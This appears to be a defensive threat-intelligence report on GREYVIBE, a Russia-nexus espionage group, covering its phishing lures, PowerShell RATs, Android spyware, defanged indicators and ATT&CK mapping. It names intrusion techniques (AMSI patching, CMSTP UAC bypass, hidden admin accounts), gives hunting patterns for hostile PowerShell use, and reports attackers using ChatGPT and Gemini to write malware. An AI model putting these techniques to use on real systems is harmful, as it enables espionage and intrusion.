Vibe-Coding the Kill Chain: The GREYVIBE Story

01 — Summary

GREYVIBE — vibe-coding the kill chain

Threat level: Amber Actor: GREYVIBE Origin: Russia-nexus Platform: Windows · Android Active since: August 2025 GenAI-assisted tooling Admiralty: A1

Attack commenced

August 2025

TA number

TA2026153

Motive

Information theft · Espionage

Targeted regions

Ukraine · Moldova · Romania · Brazil · Venezuela · Guinea

Targeted industries

Military · Government · Defense · Energy · NGOs · Software suppliers

Campaigns

PhantomMail · PhantomClick · PrincessClub · DroneLink · Nebo

GREYVIBE is a Russia-nexus threat group that has targeted Ukraine and Ukraine-related entities since at least August 2025, with development and testing dating back to April 2025. WithSecure assesses with high confidence that its operators are Russian-speaking, working in the Moscow time zone, with lures, victimology, and objectives aligned with Russian state interests — chiefly intelligence collection tied to the Russia-Ukraine conflict.

The group's defining characteristic is the systematic use of generative AI — Ideogram AI, ChatGPT, and Google Gemini — for lure imagery, site building, obfuscator and full-stack RAT development, infrastructure setup, and post-compromise scripting. GREYVIBE operates five concurrent campaigns using PhantomRelay (PowerShell RAT), LegionRelay (lightweight PowerShell RAT), and FallSpy (Android spyware), all obfuscated with a suite of custom obfuscators including LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP.

02 — Actor details

GREYVIBE — profile and tradecraft

Name Origin Target countries Target industries Motive

GREYVIBE Russia Ukraine, Moldova, Romania, Brazil, Venezuela, Guinea Military, Government, Defense, Energy, Civilian individuals, NGOs, Business entities, Software supplier Information theft, Espionage

Active campaigns and malware families:

PhantomMail PhantomClick PrincessClub DroneLink Nebo PhantomRelay / Lite / V1 / V2 FallSpy LegionRelay LOOKVALPS · LOOKVALJS · DAYLIGHT · TEASOUP

Attribution — Russia-nexus, Moscow time zone, state-aligned objectives

GREYVIBE has targeted Ukraine and Ukraine-related entities since at least August 2025, with development and testing observable from April 2025. WithSecure assesses with high confidence that operators are Russian-speaking and active in the Moscow time zone. The group's lures, victimology, and collection objectives align with Russian state interests, primarily intelligence gathering tied to the Russia-Ukraine conflict. Targeting has since expanded to Moldova, Romania, Brazil, Venezuela, and Guinea — consistent with broader Russian intelligence interest areas.

Five initial access vectors across concurrent campaigns

GREYVIBE operates five simultaneous campaigns with distinct delivery mechanisms. PhantomMail delivers malicious ZIP/RAR archives via spear-phishing links to Google Drive and 4sync. PhantomClick uses ClickFix fake-CAPTCHA pages impersonating Zoom and LAPAS. PrincessClub combines fake Ukrainian social-club websites with fake female Telegram personas to lure targets into downloading malware. DroneLink uses drone-themed fake charity sites to deliver payloads. Nebo employs a Russian-language "SPO NEBO" lure targeting military-adjacent personnel.

Unified Windows infection chain — lure → bundle → loader → payload → decoy

Every campaign follows the same Windows execution chain: a lure triggers a bundle that runs a loader showing a decoy — a PDF, a fake error pop-up, or a lure site — while the infection proceeds silently. In the script-based chain, a VBScript launcher fires a hidden PowerShell script. Both paths deploy the primary Windows payloads: PhantomRelay, a PowerShell RAT using a two-stage fingerprint-then-client model over WebSockets, and LegionRelay, a lightweight PowerShell RAT communicating over a REST API. FallSpy is the Android spyware used in the PrincessClub and Nebo campaigns. PhantomRelay also achieves lateral spread via USB using hidden files and malicious shortcuts.

Custom obfuscation suite — AMSI patching and ETW tampering

All payloads are obfuscated with GREYVIBE's custom obfuscator suite: LOOKVALPS (PowerShell), LOOKVALJS (JavaScript), DAYLIGHT, and TEASOUP. The PhantomRelayLite base variant adds SAWDUST and CRUDEDUST components which patch AMSI and tamper with the ETW provider to blind Windows telemetry and bypass script-block logging. Persistence is maintained primarily through scheduled tasks driven by a watchdog script, with a short-lived Startup folder shortcut variant as a secondary mechanism.

Privilege escalation and lateral movement — UAC bypass, RDP, hidden accounts

GREYVIBE achieves privilege escalation through three techniques: shortcut hijacking that fires a UAC prompt from a trusted icon; a CMSTP-based UAC bypass (cmstp.exe with a custom .INF file); and a custom .NET component masquerading as "Windows Update" that baits a UAC approval to re-register LegionRelay's scheduled task as SYSTEM. For lateral movement, operators enable persistent RDP, create hidden local administrator accounts concealed via the SpecialAccounts\UserList registry key, and share local disks over SMB.

C2 infrastructure and GenAI-assisted development — the defining GREYVIBE trait

PhantomRelay C2 has rotated across EDIS Global, KVMka, Cloudzy, and the suspected bulletproof host Global Connectivity Solutions LLP. FallSpy and LegionRelay C2 infrastructure remained on Baxet Group Inc. servers with Russian-language admin panels. The defining characteristic of GREYVIBE is its systematic use of generative AI: Ideogram AI for lure imagery and site design, ChatGPT and Google Gemini for obfuscator and full-stack RAT development, infrastructure provisioning guidance, and post-compromise scripting — representing an operational maturity shift enabled by commercial AI tooling.

03 — Recommendations

What to do now

Four prioritised defensive actions for security and operations teams, ordered by detection impact.

Restrict archive and script execution from email and file-sharing links

Treat ZIP/RAR archives delivered via links to Google Drive, 4sync, and similar services as high-risk. Block or sandbox execution of double-extension files (e.g., .pdf.js, .XLS.js, .Docx.rar). Disable or tightly control the Windows Script Host (wscript.exe / cscript.exe) for JavaScript loaders. Apply mail gateway rules to flag messages with archive links to consumer file-sharing services targeting government or military recipients.

Constrain PowerShell and LOLBIN abuse

Enable PowerShell Constrained Language Mode, script block and module logging, and transcription. Hunt for conhost.exe launched with the --headless parameter spawning PowerShell, for Invoke-Expression on remotely fetched content, and for command-history suppression via Set-PSReadlineOption -HistorySaveStyle SaveNothing and Remove-Module PSReadline — both GREYVIBE tradecraft signatures for covering post-execution tracks.

Hunt for watchdog and scheduled-task persistence

Alert on creation of scheduled tasks that re-execute scripts on short intervals (e.g., one minute after creation, then every three minutes). Hunt for tasks or loaders masquerading as vendor utilities — Razer, AMD, Adobe, "System Health Service," "Windows Check Updater." Inspect %ProgramData% and %LOCALAPPDATA% staging directories and Startup folder shortcuts for dropped .ps1 payloads, including SysCheckupService.ps1, RzUpdateManager.ps1, and WUDFHost.ps1.

Enforce strong UAC and privilege controls

Set UAC to always prompt and monitor for cmstp.exe invoked with custom .INF files. Watch for unexpected runas / RunAsInvoker shortcut modifications and treat sudden "Windows Update"-themed UAC prompts as suspicious. Audit creation of new local administrator accounts and accounts hidden via the SpecialAccounts\UserList registry key — a persistence mechanism GREYVIBE uses to conceal operator-created admin accounts from the Windows login screen.

04 — Indicators of compromise

IoCs — GREYVIBE / PhantomRelay / FallSpy / LegionRelay

Block or monitor all indicators below. All domains, IPs, emails, and URLs are defanged. The complete IoC set is also available via the WithSecure GitHub repository linked in References.

SHA-256 file hashes (selected)

476334f9254ef0277b3462b6086655f38358a983b95991cfe4dcdd787740906a
78773eb9738bc3306a56bf39adc8212226479c24af8bf453be9d57103a91a904
62b585f36d4b14fa1e036feed692267aa098e7fc6cabb468a07997a025309299
d60dd96ef92b43e2e4f955dd76448fc320c3f8445b661d9a4a3c40caca0aa8a5
687629ca9dc5b9b4bdf6c06fb1405449638b905f3a0c08bccac1c519ef22964d
8a7401444dd7c85b36ff7b1d0b36c5953692ef32dbeac7642fb7c1034bd8a726
e81af6ae6862d905d8634a1f6e0a8893ba28e3ce61d12ccac020ef6fae802e8b
93111e523c38d98247a78a0d1d9ae163e9874acb70721f6fe0bf451c62fff283
c823a315c2c78d2fd345c9b38bb7fc31a8cbff96c534ce9cc66c4e54bc7935a2
5115eca388860371d994457793f3a3c2c3d106da48ca12ecccb9432522c56cc3
bd3f35b91bf83427e953d4cf531a0ee4b5ec9fc76b91700274effe0eba22510f
2abb318455960b446d034967c8403ec4339ba248b946f02cb1307ed7e6f4e327
e8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3
42464c188cb8116b63938b3236504ec4ae31c7cadb9063085b30dd468d88860f
7ac06aaf0cdc1c1f0f14b0e8ccc550f9df20e79f3ce321207ec7a1867d6227ef
f79b9d14b93d4c509386684f2aeebe53ab088e704b38b359db3ee7991942aec6
08eba15964cae61156a99d7ac33eedebdd6e9f3465dc77b5d8dc17dbedc2194a
18db95f2ae20a4ea86b3296f409eb3fc1131d2758c5bfdbda16a424a64e97d18
e9634032df81334e9e960ab8b88ff05a0f7ec9c034dc012f816f09e23c18d41b
40f9399ea067d69c0985aecdc54beddbcb585d7f660606e5bb4be981811c28ba
9e443d773df5adf0ab9e622bb8179ce899f46b2166f2faa09d54a4622a9ac5cc
296932373f9c54fcf4eb285f81a17b1b93c5a96e5ff6dfa097b4d8c4b8f53b81
89e052bd182df8de5960784c663f962d44e058c8920a437f54ab75d03a7da3bd
9b7008c43814c7bf18375774bd2ed5f3bda9316dbef20b7e086fe921838f1186

Domains (selected)

lapas[.]live
zoomconference[.]click
zoomconference[.]app
princess-mens[.]fun
princess-mens-club[.]com
princessclub[.]click
princessclub[.]best
princessclub[.]online
princessclub[.]cyou
clubprincess[.]click
frontforce[.]org
ukrguard[.]org
ukrbezpeka[.]online
ironbrave[.]online
ukrvarta[.]online
edbo[.]linkpc[.]net
edbo[.]publicvm[.]com
edbo[.]work[.]gd
dsszzi[.]linkpc[.]net
declaration[.]linkpc[.]net
goodhillsenterprise[.]com
doct0rsim[.]com
routinesyscheckup[.]com
serotoninenterprise[.]com
newstarcommunity[.]com
jackscommunications[.]com
fasterscommunications[.]com
bsnowcommunications[.]com
highfleetenterprise[.]com
flyskyenterprise[.]com
newsolutionsxsenterprise[.]icu
nycpartnersenterprise[.]com
chiselworksenterprise[.]com
bluelagoonaenterprise[.]com
neuromancersolutionsenterprise[.]icu
aerobionix[.]com
prosearium[.]net
red-viper[.]com
xpertlearninghub[.]com

Email addresses (spoofed / actor-controlled)

centrenergo[.]ukr[@]gmail[.]com
centrenergo[.]ua[@]gmail[.]com
office[.]dsns[.]dp[@]gmail[.]com
kanc[.]kh[.]dsns[@]gmail[.]com
office[.]cip[.]ua[.]gov[@]gmail[.]com
office[.]gov[.]cips[@]gmail[.]com

Filenames

SysCheckupService.ps1
SystemHealthSvc.ps1
Configuration.ps1
Configurate.ps1
WUDFHost.ps1
razer_update.log
RzUpdateManager.ps1
RzTelemetry.ps1

File paths

%ProgramData%\WindowSystem
%ProgramData%\Microsoft Windows
C:\ProgramData\AMD\amd.ps1
C:\ProgramData\BackUp\backup.ps1
C:\ProgramData\Adobe\dfDgrr3.ps1
%LOCALAPPDATA%\Razer Update (staging directory)

IPv4 addresses

188[.]124[.]59[.]120
193[.]233[.]23[.]81

IPv4:Port (C2 listeners)

89[.]37[.]185[.]60[:]14000
74[.]112[.]102[.]120[:]14000
194[.]87[.]128[.]243[:]8000
194[.]87[.]108[.]110[:]8000
89[.]125[.]189[.]118[:]8000
89[.]125[.]189[.]85[:]8000
91[.]149[.]221[.]124[:]8000

Scheduled task names

System Health Service
Microsoft System Health Service
Razer Synapse Service Helper
Adobe working
BackUp checker
AMD Checker

Actor usernames (PrincessClub personas)

vikagogogo111
nastyaa2001lov
lilymihalyk

URLs

hxxps[:]//storage[.]vlasiuk[.]kiev[.]ua/SW90D0qhta/матеріали_конференції[.]zip
hxxps[:]//share[.]secureinfo[.]eu/get/ypMXMG58xH/Матеріали_конференції_доп[.]zip
hxxps[:]//www[.]4sync[.]com/web/directDownload/tcqtmocL/MyE7HPqt[.]11b47e3a02edac898638b1906774210d
hxxps[:]//drive[.]google[.]com/file/d/1RDXHPZtCzOXn6GN7UidXPo4qqZOA_UGd
hxxps[:]//drive[.]google[.]com/file/d/12ffiBTWHm6GW8chJNIXuOeALPI82VnNs
hxxps[:]//drive[.]google[.]com/file/d/1wkgvtTw_g5CvK84rWiHCr6HPZZb_OeKd
hxxps[:]//drive[.]google[.]com/file/d/1aSIXJgZUT7AQEp5B_D7gyHRq74EFUxoz
t[.]me/s/sdgsersergser

05 — MITRE ATT&CK TTPs

Tactics, techniques & sub-techniques

Full MITRE ATT&CK mapping for GREYVIBE across all five campaigns and both Windows and Android platforms.

ID Tactic Technique / sub-technique

T1583.001Resource dev.Acquire infrastructure — domains

T1584.001Resource dev.Compromise infrastructure — domains

T1585.001Resource dev.Establish accounts — social media accounts (fake Telegram personas)

T1585.002Resource dev.Establish accounts — email accounts

T1587.001Resource dev.Develop capabilities — malware (GenAI-assisted RAT development)

T1588.002Resource dev.Obtain capabilities — tool

T1608.001Resource dev.Stage capabilities — upload malware

T1566.002Initial accessPhishing — spearphishing link (Google Drive / 4sync archives)

T1566.001Initial accessPhishing — spearphishing attachment

T1566.003Initial accessPhishing — spearphishing via service (Telegram personas)

T1091Initial accessReplication through removable media (PhantomRelay USB spread)

T1204.001ExecutionUser execution — malicious link

T1204.002ExecutionUser execution — malicious file

T1204.004ExecutionUser execution — malicious copy and paste (ClickFix)

T1059.001ExecutionCommand and scripting interpreter — PowerShell (PhantomRelay / LegionRelay)

T1059.007ExecutionCommand and scripting interpreter — JavaScript (LOOKVALJS)

T1053.005ExecutionScheduled task/job — scheduled task (watchdog tasks)

T1202ExecutionIndirect command execution

T1053.005PersistenceScheduled task/job — scheduled task (watchdog re-registration)

T1547.001PersistenceBoot or logon autostart execution — registry run keys / startup folder

T1136.001PersistenceCreate account — local account (hidden admin accounts)

T1548.002Priv. escalationAbuse elevation control mechanism — bypass UAC (CMSTP, fake Windows Update)

T1547.009Priv. escalationBoot or logon autostart execution — shortcut modification (UAC hijacking)

T1027.006Defense evasionObfuscated files or information — HTML smuggling

T1140Defense evasionDeobfuscate/decode files or information (LOOKVALPS / DAYLIGHT / TEASOUP)

T1562.001Defense evasionImpair defenses — disable or modify tools (SAWDUST AMSI patch)

T1070.003Defense evasionIndicator removal — clear command history (PSReadline removal)

T1497Defense evasionVirtualization/sandbox evasion

T1564.001Defense evasionHide artifacts — hidden files and directories (USB spread)

T1564.002Defense evasionHide artifacts — hidden users (SpecialAccounts\UserList)

T1218.003Defense evasionSystem binary proxy execution — CMSTP (UAC bypass)

T1036.005Defense evasionMasquerading — match legitimate name or location (Razer, AMD, Adobe task names)

T1480Defense evasionExecution guardrails

T1003.002Credential accessOS credential dumping — Security Account Manager

T1555.003Credential accessCredentials from password stores — credentials from web browsers

T1539Credential accessSteal web session cookie

T1056.001Credential accessInput capture — keylogging

T1082DiscoverySystem information discovery

T1033DiscoverySystem owner/user discovery

T1083DiscoveryFile and directory discovery

T1016DiscoverySystem network configuration discovery

T1518DiscoverySoftware discovery

T1113CollectionScreen capture

T1005CollectionData from local system

T1119CollectionAutomated collection

T1560.001CollectionArchive collected data — archive via utility

T1123CollectionAudio capture (FallSpy — Android)

T1125CollectionVideo capture (FallSpy — Android)

T1636.003CollectionProtected user data — contact list (FallSpy — Android)

T1636.002CollectionProtected user data — call log (FallSpy — Android)

T1430CollectionLocation tracking (FallSpy — Android)

T1071.001C2Application layer protocol — web protocols (WebSocket / REST API)

T1102.001C2Web service — dead drop resolver

T1132.001C2Data encoding — standard encoding

T1572C2Protocol tunneling

T1090C2Proxy

T1219C2Remote access software (persistent RDP)

T1021.001Lateral movementRemote services — Remote Desktop Protocol

T1021.002Lateral movementRemote services — SMB/Windows admin shares (local disk sharing)

T1041ExfiltrationExfiltration over C2 channel

T1496.001ImpactResource hijacking — compute hijacking

06 — References

Sources

[1] withsecure.com/en/resources-hub/w-labs/greyvibe/

[2] withsecure.com/content/dam/labs/docs/WithSecure_GREYVIBE.pdf

[3] github.com/WithSecureLabs/iocs/blob/master/GREYVIBE/greyvibe_iocs.csv